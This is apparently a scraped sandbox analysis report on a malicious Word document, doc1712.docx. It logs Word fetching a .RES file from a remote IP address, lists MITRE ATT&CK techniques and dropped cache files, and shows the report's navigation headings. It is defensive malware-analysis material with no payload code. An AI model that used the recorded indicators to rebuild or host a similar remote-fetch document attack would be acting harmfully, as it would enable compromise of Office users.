Jun 7, 2022 17:33:45.771857023 CEST	21	OUT	HEAD /123.RES HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: 45.32.185.177 Content-Length: 0 Connection: Keep-Alive
Jun 7, 2022 17:33:45.794852018 CEST	21	IN	HTTP/1.1 200 OK Date: Tue, 07 Jun 2022 15:33:45 GMT Server: Apache/2.4.48 (Ubuntu) Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT ETag: "1701-5e0db72a43821" Accept-Ranges: bytes Content-Length: 5889 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49177	45.32.185.177	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 7, 2022 17:33:43.125586987 CEST	16	OUT	HEAD /123.RES HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: 45.32.185.177
Jun 7, 2022 17:33:43.148684025 CEST	16	IN	HTTP/1.1 200 OK Date: Tue, 07 Jun 2022 15:33:43 GMT Server: Apache/2.4.48 (Ubuntu) Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT ETag: "1701-5e0db72a43821" Accept-Ranges: bytes Content-Length: 5889 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive
Jun 7, 2022 17:33:43.395939112 CEST	17	IN	HTTP/1.1 200 OK Date: Tue, 07 Jun 2022 15:33:43 GMT Server: Apache/2.4.48 (Ubuntu) Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT ETag: "1701-5e0db72a43821" Accept-Ranges: bytes Content-Length: 5889 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive

Target ID:	0
Start time:	17:33:15
Start date:	07/06/2022
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13fbf0000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

⊘No disassembly

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report doc1712.docx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{21C75FA3-D59D-4916-8777-2F8DF89A7989}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{6894BD70-C9F6-4E64-BA1D-696172CE4314}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1677574B.RES

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DA8FA91.RES

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{218309EB-4D56-417B-9AE4-46135952AAFD}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0FB641AE-A3C8-41BE-B49C-07E97C275C10}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A4DAF9D9-9403-4C16-9440-8C0CD34B4722}.tmp

C:\Users\user\AppData\Local\Temp\{2988F61F-4F9A-4845-AAA6-0600A931CA19}

C:\Users\user\AppData\Local\Temp\{DA1724A8-2EEB-4B4F-8C48-5E256737D51E}

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\doc1712.LNK

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\Desktop\~$oc1712.docx

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

Windows Analysis Report
doc1712.docx